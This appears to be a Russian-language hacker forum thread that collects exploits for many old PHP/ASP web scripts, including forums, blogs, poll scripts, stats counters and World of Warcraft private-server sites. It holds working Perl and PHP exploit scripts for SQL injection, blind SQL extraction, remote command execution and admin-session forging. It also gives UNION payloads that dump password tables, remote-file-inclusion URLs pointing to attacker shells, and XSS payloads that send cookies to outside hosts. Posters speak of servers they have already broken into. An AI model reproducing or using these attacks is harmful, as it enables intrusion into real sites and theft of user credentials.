Уязвимости в vuBB Vendor: http://www.vubb.com/ vuBB alpha RC1 SQL Injection Code: http://host/forum/index.php?act=viewforum&f=[SQL] http://host/forum/index.php?act=viewtopic&t=[SQL] http://host/forum/index.php?act=usercp&view=[SQL] Active XSS В профиле пользователя содержимое многих полей не фильтруется. Атакующий может выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Passive XSS Code: http://www.example.com/forum/index.php?act=newreply&t='>%3CIFRAME% 20SRC=javascript: alert(%2527XSS%2527)%3E%3C/IFRAME%3E&f=6 Path disclosure Code: http://www.example.com/forum/index.php?act=viewforum&f=' vuBB <=0.2 Remote SQL Injection (cookies) http://milw0rm.com/id.php?id=1543 Index.PHP SQL Injection Vulnerability http://www.securityfocus.com/vulnerabilities/exploits/vubb_sql_exploit.pl vuBB <= 0.2.1 SQL Injection, XSS, CRLF Injection, Full Path Disclosure Code: #!/usr/bin/perl # # by DarkFig -- acid-root.new.fr # French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt # use IO::Socket; use LWP::Simple; # Header print "\r\n+---------------------------------------+", "\r\n"; print "| vuBB <= 0.2.1 [BFA] SQL Injection -|", "\r\n"; print "+---------------------------------------+", "\r\n"; # Usage if(!$ARGV[2]){ print "| Usage: <host> <path> <username> ------|", "\r\n"; print "+---------------------------------------+", "\r\n"; exit; } # Host if($ARGV[0] =~ /http:\/\/(.*)/){ $host = $1; } else { $host = $ARGV[0]; } print "[+]Host: $host\r\n"; # Var my $path = $ARGV[1]; my $user = $ARGV[2]; print "[+]User: $user\r\n"; my $port = 80; my $fpd = "http://".$host.$path."includes/vubb.php"; my $err1 = "[-]Can't connect to the host\r\n"; my $err2 = "[-]Can't retrieve the full path\r\n"; my $err3 = "[-]Can't retrieve the results\r\n"; my $poti = "POST "."$path"."index.php?act=register&action=register"." HTTP/1.1"; # Full Path Disclosure $req0 = get($fpd) or die print $err1 and end(); if($req0 =~ /in <b>(.*)\/includes\/vubb.php<\/b>/) { $fullpath = $1."/thisismypasswd.txt"; print "[+]Path: $1\r\n"; } else { print $err2 and end(); } # Malicious data my $pdat = "user=$user"."%27+INTO+OUTFILE+%27"."$fullpath"."%27%23"."&email=a669c4570f%40hotmail.com&vemail=a669c4570f%40hotmail.com&pass=mypassword&vpass=mypassword&agreement=iacceptohackit&agree=on"; my $ldat = length $pdat; my $req1 = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => "tcp" ) or print $err1 and end(); print $req1 "$poti", "\r\n"; print $req1 "Host: $host", "\r\n"; print $req1 "Content-Type: application/x-www-form-urlencoded", "\r\n"; print $req1 "Content-Length: $ldat", "\r\n\n"; print $req1 "$pdat", "\r\n"; close($req1); # Results $req2 = get("http://".$host.$path."/thisismypasswd.txt") or print $err3 and end(); open(f, ">VUBB_RESULT.txt"); print f $req2; close(f); print "[+]Done: VUBB_RESULT.txt\r\n"; end(); # Bye sub end { print "+---------------------------------------+", "\r\n"; exit; }
LulieBlog 1.02 (voircom.php id) Remote SQL Injection Vulnerability Vendor: http://sourceforge.net/project/platformdownload.php?group_id=204083 Remote SQL Injection Vulnerable: LulieBlog Version 1.02 Exploit: Code: http://Sitename/voircom.php?id=-1%27union/**/select/**/0,concat(nom_parametre,0x3a,0x3a,valeur_parametre),2,3,4,5/**/from/**/lulieblog_parametres/*
Foojan WMS 1.0 Remote Sql Injection Vendor: http://www.iranscripts.com/download/Foojan-WMS1.0%20Full.rar Remote Sql Injection Vulnerable: Foojan WMS 1.0 Exploit: Code: http://Sitename/index.php?story=1%27union/**/select/**/0,concat(0x55736572203a20,UserName,0x202b2050617373776f7264203a,PassWord),2,3,4,5,6,7,8/**/from/**/authors/*
WSN Guest 1.21 Version Comments.PHP “ID” SQL Injection SQL Injection Vulnerable: WSN Guest 1.21 Exploit: Code: -1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,null,null/**/FROM/**/wsnguest_members/*
Tiger PHP News System SQL Injection Vendor: http://tpns.k-na.se/ SQL Injection Vulnerable: probably all Exploit: Code: http://localhost/?page=newscat&catid=-666%20union%20select%20passwd%20fr om%20user
The Everything Development System <= Pre-1.0 SQL Injection Exploit: http://milw0rm.com/exploits/5037 BookmarkX script 2007 (topicid) Remote SQL Injection Exploit: http://milw0rm.com/exploits/5040 BlogPHP v.2 (id) XSS / Remote SQL Injection Exploit: http://milw0rm.com/exploits/5042 //(с)вежачок от milw0rm.com
[..::Уязвимости скриптов голосования::..] Nabopoll 1.2 Vendor: www.nabocorp.com/nabopoll/ Blind SQL Injection Exploit: PHP: <? # Nabopoll Blind SQL Injection P0C Exploit # Download: www.nabocorp.com/nabopoll/ # coded by s0cratex # Contact: [email protected] error_reporting(0); ini_set("max_execution_time",0); // just change the default values... $srv = "localhost"; $path = "/poll"; $port = 80; $survey = "8"; //you can verify the number entering in the site and viewing the results... echo "==================================================\n"; echo "Nabopoll SQL Injection -- Proof of Concept Exploit\n"; echo "--------------------------------------------------\n\n"; echo " -- MySQL User: "; $j = 1; $user = ""; while(!strstr($user,chr(0))){ for($x=0;$x<255;$x++){ $xpl = "/result.php?surv=".$survey."/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),".$j.",1))=".$x."),1,0)))/*"; $cnx = fsockopen($srv,$port); fwrite($cnx,"GET ".$path.$xpl." HTTP/1.0\r\n\r\n"); while(!feof($cnx)){ if(ereg("power",fgets($cnx))){ $user.=chr($x);echo chr($x); break; } } fclose($cnx); if ($x==255) { die("\n Try again..."); } } $j++; } echo "\n"; ?> RFI PoC: Code: http://www.site.com/[path]/survey.inc.php?path=http://shell.txt? Admin without password Code: http://target/nabopoll/admin/config_edit.php http://target/nabopoll/admin/template_edit.php http://target/nabopoll/admin/survey_edit.php *Доступ к этим файлам может получить любой пользователь, без пароля *** PollMentor v2.0 Vendor: http://www.aspindir.com/indir.asp?id=4406 PoC: Code: http://[site]/[script-path]/pollmentorres.asp?id=-1+UPDATE+poll+SET+question='HekId';-- *** Advanced Poll <= 2.0.5 Vulnerable: Advanced Poll 2.0.0 >= 2.0.5 Remote Code Execution Exploit: Code: #!/usr/bin/perl -w # Advanced Poll 2.0.0 >= 2.0.5-dev textfile RCE. # # date: 30/07/06 # # diwou <[email protected]> # # PHCKSEC (c) 2001-2006. # # Hey, what a mad world! # use strict; use warnings; use LWP::UserAgent; use MD5; # # args: http://url/apoll_path cmd # # proxy: export PROXY='http|https://www.my.big.and.famous.proxy:8080/' # url: http|https://tatget:(port)/phppoll/ # die("RTFC! ;)") unless(@ARGV>1); my ($lwp,$agent,$out,$res,$url,$cmd)=(undef,undef,undef,undef,$ARGV[0],$ARGV[1]); my %ipost= ( poll_tplset => 'default', 'tpl[display_head.html]' => <<HEAD \\".system(getenv(HTTP_PHP)).exit().\\" <table width="\$pollvars[table_width]" border="0" cellspacing="0" cellpadding="1" bgcolor="\$pollvars[bgcolor_fr]"> <tr align="center"> <td><style type="text/css"> <!-- .input { font-family: \$pollvars[font_face]; font-size: 8pt} .links { font-family: \$pollvars[font_face]; font-size: 7.5pt; color: \$pollvars[font_color]} --> </style><font face="\$pollvars[font_face]" size="-1" color="#FFFFFF"><b>\$pollvars[title]</b></font></td> </tr> <tr align="center"> <td> <table width="100%" border="0" cellspacing="0" cellpadding="2" align="center" bgcolor="\$pollvars[bgcolor_tab]"> <tr> <td height="40" valign="middle"><font face="\$pollvars[font_face]" color="\$pollvars[font_color]" size="1"><b>\$question</b></font></td> </tr> <tr align="right" valign="top"> <td> <form method="post" action="\$this->form_forward"> <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"> <tr valign="top" align="center"> <td> <table width="100%" border="0" cellspacing="0" cellpadding="1" align="center"> HEAD , action => '', tplset => 'default', tpl_type => 'display', session => '', uid => 1 ); my %epost= ( session => '', uid => 1, poll_tplst => 'default', tpl_type => 'display', ); my %zday= ( username => 'jakahw4nk4h', 'pollvars[poll_username]' => 'jakahw4nk4h', password => 'fuckoff', 'pollvars[poll_password]' => '' ); $zday{'pollvars[poll_password]'}=&md5($zday{password}); $agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter. #$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1"; $lwp=new LWP::UserAgent(); $lwp->agent($agent); $lwp->timeout(10); $lwp->protocols_allowed(['http','https']); if($ENV{PROXY}) { $lwp->proxy(['http','https'],$ENV{PROXY}); print "Using proxy ".$ENV{PROXY}."\n"; } $url.="/" if($url!~/\/$/); $url.="admin/index.php"; print "Doing some pretty with ".$url."...\n\n"; print "+ generating session...\n"; $out=$lwp->post($url,\%zday)->content(); if($out=~ /index\.php\?session=((.){32})/) { $ipost{'session'}=$epost{'session'}=$1; print " session: ".$ipost{'session'}."\n"; $url=~s/index\.php/admin_templates\.php/g; print "+ injecting diplay_head.html template...\n"; $out=$lwp->post($url,\%ipost)->content(); $epost{'action'}=$1 if($out=~ /<input type="submit" name="action" value="(.*)" class="button">/); print " button: ".$epost{'action'}."\n"; $url=~s/admin_templates\.php/admin_preview\.php/g; print "+ executing...\n"; $out=$lwp->post($url,\%epost,PHP => "echo BOCE;".$cmd.";echo EOCE")->content(); print "-- BOCE --\n"; foreach $out (split(/\n/,$out)) { $res=1,next if($out=~/BOCE/); $res=0,next if($out=~/EOCE/); print $out."\n" if($res); } print "-- EOCE --\n"; } else { print "don't worry, u can improve me! eh eh eh :D?\n"; } sub md5 { $_=new MD5; $_->add(@_); return unpack("H*",$_->digest()); } Remote Admin Session Generator Exploit: Code: #!/usr/bin/perl -w # Advanced Poll 2.0.0 >= 2.0.5-dev textfile admin session gen. # # # 0day! KEEP IT PRIVATE 0day! # # date: 30/07/06 # # diwou <[email protected]> # # PHCKSEC (c) 2001-2006. # # see templates for code execution ;). use strict; use warnings; use LWP::UserAgent; use MD5; my ($lwp,$agent,$out,$url,$proxy)=(undef,undef,undef,$ARGV[0],$ARGV[1]); my %zday= ( username => 'jakahw4nk4h', 'pollvars[poll_username]' => 'jakahw4nk4h', password => 'fuckoff', 'pollvars[poll_password]' => '' ); $zday{'pollvars[poll_password]'}=&md5($zday{password}); $agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter. #$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1"; # # args: url proxy(optional) # # url: http|https://tatget:(port)/phppoll/ # proxy: http|https://hostname:(port)/ # die("RTFC! ;)") unless(@ARGV); # some lwp routines... $lwp=new LWP::UserAgent(); $lwp->agent($agent); $lwp->timeout(10); $lwp->protocols_allowed(['http','https']); $lwp->proxy(['http','https'],$proxy) if(@ARGV>1); $url.="/" if($url!~/\/$/); $url.="admin/index.php"; print "Using proxy ".$proxy."\n" if($proxy); print "Doing some pretty with ".$url."...\n\n"; $out=$lwp->post($url,\%zday)->content(); if($out=~ /index\.php\?session=((.){32})/) { print "well, you are a bigone ;).\n"; print "try: ".$url."?session=".$1."&uid=1\n"; } else { print "don't worry, u can improve me! eh eh eh :D?\n"; } sub md5 { $_=new MD5; $_->add(@_); return unpack("H*",$_->digest()); } RFI Vulnerable: Advanced Poll 2.0.2 PoC: Code: http://www.example.com/[path_advanced_poll]/admin/common.inc.php?base_path=http:www.example.com *** Flipper Poll v1.1.0 Vendor: http://sourceforge.net/project/showfiles.php?group_id=59828 RFI PoC: Code: /poll.php?root_path=evilscripts? *** Vote-Pro 4.0 Vendor: http://www.vote-pro.com/ Remote Code Execution Exploit: Code: use IO::Socket; $port = "80"; # connection port $target = shift; # vote-pro.com $folder = shift; # /votepro/ sub Header() { print q {Vote-Pro Code Injection Exploit - writ3r [at] gmail.com ------------------------------------------------------- }; } sub Usage() { print q { Usage: votecmd.pl [target] [directory] Example: votecmd.pl vote-pro.com /votepro/ }; exit(); } Header(); if (!$target || !$folder) { Usage(); } print "[+] Connecting...\n"; $cmd = "dir"; while ($cmd !~ "exit") { $xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...\r\n"; print $xpack "GET ".$folder."poll_frame.php?poll_id=hyphy;system($_GET[com]);&com=".substr($cmd, 0, -1)."; HTTP/1.1\n"; print $xpack "Host: $target\n"; print $xpack "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n"; print $xpack "Accept: text/html\n"; print $xpack "Connection: keep-alive\n\n"; print "[cmd]\$ "; $cmd = <STDIN>; $cmd =~ s/ /%20/g; } print "[!] Connection to host lost...\n"; *** LunarPoll 1.0 Vendor: http://dexxaboy.com/scripts/lunarpoll/download/ RFI PoC: Code: show.php?PollDir=http://attacker.txt? *** cwmVote 1.0 Vendor: http://explorer.cwm-design.de/dirs/41/cwmVote.rar RFI PoC: Code: http://[target]/[cwm_vote_path]/archive.php?abs=http://[Shellscript] *** Absolute Poll Manager Vendor: http://www.xigla.com/absolutepm/ XSS Vulnerable: XIGLA SOFTWARE Absolute Poll Manager XE 4.1 PoC: Code: http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>alert("running+code+within+the+context+of+"%2bdocument.domain)</script> http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>location="http://www.example2.com/?"%2bdocument.cookie</script> http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=%3cscript%3elocation=%22http%3a//www.%65xample%2ecom/?%22%2bdocument.cookie%3c/script%3e& *** PHPCentral Poll Script Vendor: http://www.phpcentral.org/scripts.php Remote Command Execution Vulnerable: PHPCentral Poll Script v1.0 PoC: Code: http://www.example.com/poll.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?& cmd=id http://www.example.com/pollarchive.php?_SERVER[DOCUMENT_ROOT]=http://evi l.txt?&cmd=id *** X-Scripts X-Poll SQL Injection PoC: Code: http://www.example.com/poll/top.php?poll=' AND 0 UNION SELECT 0, '%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' , 1, 2, 3, 4, 5, 6, 7, 8,'' INTO OUTFILE '/usr/webserver/public_htm/rshell.php *** Comdev Vote Caster Vendor: http://www.comdevweb.com/votecaster.php SQL Injection Vulnerable: Comdev VoteCaster 3.1 PoC: Code: http://www.example.com/index.php?pageaction=results&campaign_id=[SQL] *** AzDGVote RFI PoC: Code: http://www.example.com/poll/view.php?int_path=http://attacker http://www.example.com/ordinaopenpodcast/script/poll/view.php?int_path=http://attacker ***
4images 1.7.6 [COLOR=#FFFFF]Active XSS 4images 1.7.6 Скорей всего и ранние версии[/COLOR][COLOR=#FFFFF]1 В настройках профиля(Control Panel) в поле Homepage: PHP: <img src="javascript:alert(document.cookie)"width=0> Тестил на Opere 9.50 beta/9.21 & IE6 на Лисе не пашет =( 2 В поле Description: PHP: <a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**/document.cookie/**/\/**/)/**/\/**/)"> тока под IE ыы первая бага найденая мной [/COLOR]
wow-ultimate; версии: все. /rename.php Code: [COLOR=DarkOrchid][B]//Проверка аккаунта mysql_select_db($config['db_realmd']); $query = "SELECT * FROM `account` WHERE `username`='".$acc."';" ;[/B][/COLOR] скуля пост+слепая, однако на всех взломанных серверах хватило прав на into dumpfile дефолтные пути: Code: [B][COLOR=DarkOrchid]Z:\home\[serverip]\www\ W:\home\[serverip]\www\ C:\server\mangos\diskw\www\ C:\server\diskw\www\[/COLOR][/B] под никсами чаще всего /usr/home/server/ dreammangos: версии (?) пхп иньекции в компонентах /media/addgalwall.php /media/addgalscreen.php (компоненты дефолтные) нет проверки на расширения файлов. /ps не забудте сделать вайп
Раскрытие пути в Sypex Dumper Lite 1.0.8: Если скриптом хоть раз пользовались то: Code: http://site/backup/dumper.cfg.php "backup/dumper.cfg.php" - относительно расположения файла dumper.php . Также, при неправильном вводе пароля виден DBHOST и есть возможность вводить теги в поле логина, но смысла в этом особого нет, т.к. длина режется до 16 символов.
OneCMS 2.5 Local File Include Продукт: OneCMS Версия: 2.5 Производитель: http://www.insanevisions.com/ Воздействие: Local File Include Ошибка присутствует в скрипте install_mod.php Пример: Code: http://site.ru/onecms/install_mod.php?act=go&load=shell.php../../../../../../../../../../../../../etc/passwd
TAGWORX.CMS Remote SQL Injection Продукт: TAGWORX.CMS Версия: 3.00.02 Производитель: http://www.tagworx.net/ Воздействие: Remote SQL Injection Ошибка существует из-за недостаточной обработки данных в параметре "cid" в скрипте contact.php и в параметре "nid" в скрипте news.php Пример: Code: http://site.ru/contact.php?cid=-1+UNION+SELECT+concat_ws(char(58),id,user_nick,user_pass,concat(user_prename,char(0x20),user_name))+from+t_user-- http://site.ru/news.php?nid=-1+UNION+SELECT+1,2,3,concat_ws(char(58),id,user_nick,user_pass,concat(user_prename,char(0x20),user_name)),5,6+from+t_user--
локальные сервера wow wow-ultimate <= 2.0 sql inj: Code: gilds.php?guid=[sql] WOLK site <=(4.0) local file including: Code: lk_n?nw=../../../../mangos/mangosd.conf%00 lk_s?file=../../../../mangos/mangosd.conf%00 lk_u?page=../../../../mangos/mangosd.conf%00 последняя версия распостраняется с ipb 2.3.4 - регистрируемся на форуме, прикрепляем к посту file.txt с пхп кодом, идем по адресу: Code: http://site/forum/uploads/monthly_05_2008/ *через 2 дня _06_2008 =) ищем наш файл в формате .ipb, и инклудим его.
Биллинговая система UTM от фирмы NetUp Множественные уязвимости в NetUP Программа: NetUP Опасность: Критическая Описание: Несколько уязвимостей обнаружено в NetUP. Злонамеренный пользователь может получить доступ к системе и манипулировать учетной записью пользователя. Сценарии "admin" and "utm_stat” не проверяют "sid" параметр. В результате злонамеренный пользователь может внедриться в сессию другого пользователя через SQL инъекцию: 2. Удаленный пользователь может изменять данные других пользователей, используя уязвимость SQL инъекции в '/cgi-bin/utm/user_stat' script сценарии: Также сообщается, что множество других сценариев уязвимы к SQL инъекции.
Статистика/счётчик Firestats 1.4.4-stable: XSS: Code: http://site/stats/php/window-delete-site.php?site_id=')"><script>alert(/XSS/)</script> http://site/stats/php/window-new-edit-site.php?site_id="><script>alert(/XSS/)</script> http://site/stats/lib/ip2c/test-ip.php?ip=<script>alert(/XSS/)</script> Возможность узнать префикс БД, имя пользователя БД и хост: Code: http://site/stats/php/page-database.php http://site/stats/tools.php?file_id=system_test (только префикс) Если админ криворукий, можно добавить новго админа тут: Code: http://site/stats/tools.php?file_id=manage_users Узнать мыло админа и юзеров (не баг, но поидее этого не должно быть): Code: http://site/stats/php/page-users.php http://site/stats/php/window-edit-user.php?user_id=1 Раскрытие пути: Code: stats/integration/mediawiki/firestats-mediawiki.php stats/php/tabbed-pane.php stats/php/tools-menu.php stats/firestats-wordpress.php stats/php/ip2country.php stats/php/footer.php status.php stats/php/page-stats.php stats/login.php stats/php/page-add-admin.php stats/firestats-gregarius.php stats/lib/ip2c/benchmark.php stats/lib/ezsql/mysql/ez_sql_mysql.php З.Ы. Папка со статистикой может называться и не stats. Багов больше, толком не рылся, это то, что сразу на глаза попалось.
PowerPhlogger 2.2.5 Уязвимости выкладываю в порядке мною нахождения ихВсе проверялись на версии 2.2.5 XSS: Post-запрос на странице http://site/dspLogs.php Code: "><script>alert(document.cookie)</script> В полях: Host, Referrer, Agent Information, res, colo, online, mp XSS: Code: http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Также нашел интересные мета-теги: Code: <meta name="PHP Version" content="..." /> <meta name="MYSQL Version" content="..." /> Странная ксс: На странице http://site/dspStats.php?edit=mp в логах посещений фильтруется информация про страницы сайта,если счетчик установленный на индексной странице то можно указать код в качестве адреса страницы) Code: http:/site/<script>alert(document.cookie)</script> Вобщем так Code: http://site/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Full path disclosure: Code: http://site/include/edCss.inc.php http://site/include/foot.inc.php http://site/include/get_csscolors.inc.php http://site/include/head.inc.php http://site/include/head_stuff.inc.php http://site/include/loglist.inc.php http://site/include/pphlogger_send.inc.php http://site/modules/usercreate.php http://site/modules/htmlMimeMail.php http://site/modules/img_vis_per_hour.mod.php http://site/edit_user.php http://site/main-dummy.php http://site/main.php http://site/modules/htmlMimeMail.php http://site/modules/img_vis_per_hour.mod.php http://site/modules/usercreate.php Еще XSS(найденые мною давно): Post запрос на странице http://site/edUserprofile.php (возможны как Get так и Post запросы) Code: </textarea><script>alert(document.cookie)</script> В параметре N_your_url Code: "><script>alert(document.cookie)</script> В параметрe N_email Code: "><script src=http://site.com В параметрах N_fg_c, N_bg_c (ограничение в 30 символов) XSS: Code: http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=edit SQL Injection: Code: http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit DoS: http://site/newaccount_self.php Скрипт редеректит сам себя.Mozilla автомаматический останавливает процесс,а вот ИЕ-нет.Поэтому если клиент,который обращается к скрипту сам не остановит редирект(например какой-то бот поисковых систем) то создается большая нагрузка на сервер. Information Leakage: http://site/main_location.inc XSS: Code: http://site/dspLogs.php/%22%3E%3Cscript%20src=script.js%20 Code: http://site/dspStats.php/%22%3E%3Cscript%20src=script.js%20 Code: http://site/edCss.php/%22%3E%3Cscript%20src=script.js%20 Данные ксс возможны в связи с использованием в скриптах $PHP_SELF.
Scuttle XSS: Code: http://site/bookmarks/%3CBODY%20onload=alert(document.cookie)%3E Code: http://site/?sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Вводим в поиске следующий пост запрос Code: </textarea><script>alert(document.cookie)</script> Local File Inclusion: Code: http://site.com/help/syntax.html?la=/../query
Boundless Source XSS: Code: http://site/catalog/index.cgi?search=%3Cscript%3Ealert(document.cookie)%3C/script%3E&sparam=all&category=cat20 Code: http://site/catalog/add-lnk.cgi?cmd=sendpassword&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/catalog/add-lnk.cgi?cmd=edit&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/catalog/admin.cgi?cmd=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Активка: На странице http://site/catalog/add-lnk.cgi?cmd=showform пишем Code: <BODY onload=alert(document.cookie) В полях: Название ресурса, URL, Регион, Описание сайта.
RotaBanner XSS: Code: http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
W-Agora XSS: Code: http://site/news/search.php3?site=x&bn=y_news&gosearch=1&sf=1&pattern=%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/static/list.php?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/news/login.php3?site=x&bn=y_news&loginform=1&loginuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/news/login.php3?site=x&bn=y_news&loginform=1&loginpassword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/news/login.php3?site=x&bn=y_news&loginform=1&redirect_url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/news/login.php3?site=x&bn=y_news&loginform=1&editsite=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/news/login.php3?site=x&bn=y_news&loginform=1&userid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E SQL: Code: http://site/news/search.php3?site=x&bn=y_news&gosearch=1&sf=1&pattern=xxxxxxxxxx Full path disclosure: http://site/static/list.php?key=-1102352364